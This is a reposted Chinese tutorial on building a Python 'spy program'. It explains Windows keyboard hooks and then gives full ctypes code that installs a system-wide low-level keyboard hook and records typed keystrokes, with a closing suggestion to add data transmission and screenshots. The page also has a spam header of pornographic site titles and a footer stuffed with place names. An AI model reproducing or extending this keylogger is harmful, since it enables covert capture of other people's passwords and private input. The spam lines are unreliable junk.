亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

使用Python打造一款間諜程序的流程分析

發布時間:2020-10-07 15:30:35 來源:腳本之家 閱讀:168 作者:寂夜云 欄目:開發技術

知識點

這次我們使用python來打造一款間諜程序

程序中會用到許多知識點,大致分為四塊

  win32API 此處可以在MSDN上查看

  Python基礎重點在cpytes庫的使用,使用方法請點擊此處

  C語言基礎

  Hook

程序的基本原理在于通過注冊Hook,記錄系統事件

那么什么是Hook呢

Hook 技術又叫做鉤子函數,系統在調用函數之前,鉤子程序就先捕獲該消息,鉤子函數先得到控制權,這時鉤子函數既可以加工處理(改變)該函數的執行行為,還可以強制結束消息的傳遞

注冊Hook時我們需要先導入DLL庫,在Python中我們使用ctypes來導入,導入方法如下

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

我們導入了user32.dll和kernel32.dll

這兩個DLL有什么用處呢

  user32.dll   是Windows用戶界面相關應用程序接口,用于包括Windows處理,基本用戶界面等特性,如創建窗口和發送消息

  kernel32.dll  控制著系統的內存管理、數據的輸入輸出操作和中斷處理

流程部分

知道了我們要使用什么樣的工具,那么第一步應該怎么做呢

1.首先我們需要先注冊Hook到系統上,通過user32.dll中的SetWindowsHookExA函數,我們可以在系統上注冊鉤子

HHOOK SetWindowsHookExA(
 int idHook,
 HOOKPROC lpfn,
 HINSTANCE hmod,
 DWORD dwThreadId
);

通過查看文檔我們看到SetWindowsHookExA函數的參數及參數類型如上所示,詳細文檔點擊此鏈接查看

通過文檔我們看到第一個參數idHook中填入鉤子的類型

WH_KEYBOARD_LL的常量值為13代表的意思是監視低級鍵盤輸入事件,我們此處來監聽鍵盤事件

第二個參數lpfn代表指向鉤子過程的指針,要填入鉤子過程(函數),我們可以在此處來添加額外代碼達到我們想要達成的目的

第三個參數hmod表示為DLL句柄,我們可以使用kernel32中的GetModuleHandleW來獲取句柄

最后一個參數dwThreadId我們填入0代表與同一桌面上所有的線程關聯

代碼如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

如何使用Python來編寫我們的鉤子過程呢,通過ctypes文檔我們可以得知windows下使用WINFUNCTYPE來創建函數

此時我們發現有WINFUNCTYPE和CFUNCTYPE兩個函數,具體要使用哪一個呢,這兩個的區別為

  WINFUNCTYPE  為Windows下獨有的,通過使用使用stdcall調用約定的函數

  CFUNCTYPE   使用標準C調用約定的函數

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

因為我們調用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會使用LowLevelKeyboardProc回調函數,同時我們也需要在Python定義它

LowLevelKeyboardProc數據結構如下

LRESULT CALLBACK LowLevelKeyboardProc(
 _In_ int nCode,
 _In_ WPARAM wParam,
 _In_ LPARAM lParam
);

按照官方文檔提示如果nCode小于零,則掛鉤過程必須將消息傳遞給CallNextHookEx函數,而無需進一步處理,并且應返回CallNextHookEx返回的值

我們轉換為Python代碼

class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]

def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 # 此處插入我們的代碼
 pass
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

最后在我們退出程序時還需要刪除Hook,不然大量的Hook會使系統運行緩慢,雖然在Windows 7及更高版本上,該鉤子會被靜默刪除而不被調用。應用程序無法知道掛鉤是否已刪除。我們還是主動進行刪除

刪除需要使用user32.dll的UnhookWindowsHookEx,參數為Hook句柄

user32.UnhookWindowsHookEx(hooked)

下面貼上全部代碼

import sys
from ctypes import *
from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]
def uninstallHookProc(hooked):
 if hooked is None:
 return
 user32.UnhookWindowsHookEx(hooked)
 hooked = None
def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 if wParam == 256:
 if 162 == lParam.contents.value:
 print("Ctrl pressed, call Hook uninstall()")
 uninstallHookProc(hooked)
 sys.exit(-1)
 capsLock = user32.GetKeyState(20)
 # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
 if lParam.contents.value==13:
 print("\n")
 elif capsLock:
 print(chr(lParam.contents.value),end="")
 else:
 print(chr(lParam.contents.value+32),end="")
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
def startKeyLog():
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
def installHookProc(hooked, pointer):
 hooked = user32.SetWindowsHookExA(
 13,
 pointer,
 kernel32.GetModuleHandleW(),
 0
 )
 if not hooked:
 return False
 return True
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):
 print("Hook installed")
 try:
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
 except KeyboardInterrupt as kerror:
 uninstallHookProc(hooked)
 print("Hook uninstall...")
else:
 print("Hook installed error")

貼上我們的效果圖

使用Python打造一款間諜程序的流程分析

我們還可以再添加上額外的代碼比如數據傳輸,截屏等等 ^_^

如何想要了解更多的只是請點擊這里把 => 地址

總結

以上就是使用Python打造一款間諜程序的流程分析的詳細內容,更多關于python間諜程序請關注億速云其它相關文章!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

诸暨市| 泸西县| 德庆县| 突泉县| 黑河市| 徐闻县| 隆回县| 穆棱市| 宜宾市| 永康市| 大竹县| 北安市| 湘乡市| 宁晋县| 平顶山市| 安塞县| 通化县| 峨眉山市| 新绛县| 芜湖市| 邛崃市| 礼泉县| 洛川县| 永靖县| 阜康市| 陇南市| 瑞丽市| 华坪县| 开阳县| 监利县| 辽阳县| 青浦区| 深州市| 广安市| 灌云县| 迁西县| 商洛市| 丽水市| 玛纳斯县| 阳信县| 邮箱|